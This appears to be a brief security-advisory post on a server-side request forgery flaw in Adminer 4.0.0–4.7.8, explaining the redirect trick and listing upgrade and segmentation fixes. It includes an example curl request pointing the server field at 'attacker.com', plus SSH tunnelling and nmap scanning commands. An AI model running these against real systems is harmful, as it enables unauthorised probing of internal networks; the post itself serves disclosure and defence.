Listen to this Post
How the mentioned CVE works:
The vulnerability exists in Adminer versions 4.0.0 to 4.7.8, specifically in the bundled `adminer.php` file which includes all database drivers. The flaw allows for Server-Side Request Forgery (SSRF) by manipulating the database connection flow. An attacker can supply a malicious external URL for a database host. When Adminer attempts to connect, it follows HTTP redirections. This behavior can be exploited to redirect the server’s internal HTTP request to an arbitrary internal or external system, potentially allowing the attacker to probe and interact with services within the server’s network that are otherwise inaccessible, leading to information disclosure or further exploitation.
Platform: Adminer
Version: 4.0.0 – 4.7.8
Vulnerability: Server-Side Request Forgery
Severity: High
date: 2021-03-02
Prediction: Patched in 4.7.9
What Undercode Say:
`curl -X POST http://target/adminer.php -d ‘server=attacker.com&…’`
`ssh -L 5432:internal-db:5432 user@jumpserver`
`nmap -sV 192.168.1.1/24 –script http-auth-finder`
How Exploit:
Attacker sets a malicious database host. Adminer server sends a request. Attacker’s server responds with a redirect to an internal IP. Adminer follows the redirect, probing internal services.
Protection from this CVE:
Upgrade to Adminer 4.7.9. Use restricted network policies. Employ driver-specific Adminer versions. Implement network segmentation for databases.
Impact:
Unauthorized internal network access. Sensitive service interaction. Potential data exposure.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
